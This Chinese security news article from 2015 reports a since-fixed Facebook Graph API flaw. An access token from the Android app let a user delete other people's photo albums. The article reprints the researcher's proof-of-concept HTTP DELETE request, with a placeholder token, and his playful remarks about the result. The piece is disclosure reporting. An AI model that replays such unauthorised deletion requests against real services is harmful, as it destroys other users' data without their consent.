Facebook用户相册任意删除漏洞

2015-02-14 217565人围观 ,发现 14 个不明物体 漏洞资讯

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

印度安全研究人员Laxman Muthiyah 在Facebook  Graph API上发现一个安全漏洞,攻击者可以利用该漏洞删除任意用户Facebook相册。

FreeBuf科普:什么是Graph API?

Facebook Graph API可以理解为一个可以访问Facebook数据的Web服务。该API提供了对人员,相册,事件等等Facebook对象以及这些对象之间诸如朋友,标签,分享内容等等连接之间的访问。 

当输入一个URL后,会返回一个Json对象 。Graph API是开发人员读写用户数据的主要方式。目前所有的Facebook应用程序使用的都是Graph API。

漏洞描述

理论上来说facebook  Graph API需要访问令牌(access token)才能访问或者修改数据,但是研究人员却可利用移动版Facebook生成的访问令牌删除其他Facebook用户相册。

对于攻击者来说删除受害者Facebook账户下的相册非常简单,只需要发送一个基于HTTP的Graph API请求即可完成任意删除操作。

请求: -
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
响应:-true
Album(518171421550249) got deleted :D so whatsthe next step? Took victim's album id and tried to delete it. I was verycurious to see the result.

请求: -
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
结果:-true
OMG :D the album got deleted! So i got the key to delete all of your Facebookphotos :P lol :D "

POC视频

[参考来源securityaffairs,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]

更多精彩
相关推荐

这些评论亮了

  • 某国电信 回复
    瞎讲。根本不存在facebook这网站。
    )30( 亮了
发表评论

已有 14 条评论

取消
Loading...

特别推荐

文章目录

    文章目录

      推荐关注

      官方公众号

      聚焦企业安全

      填写个人信息

      姓名
      电话
      邮箱
      公司
      行业
      职位
      css.php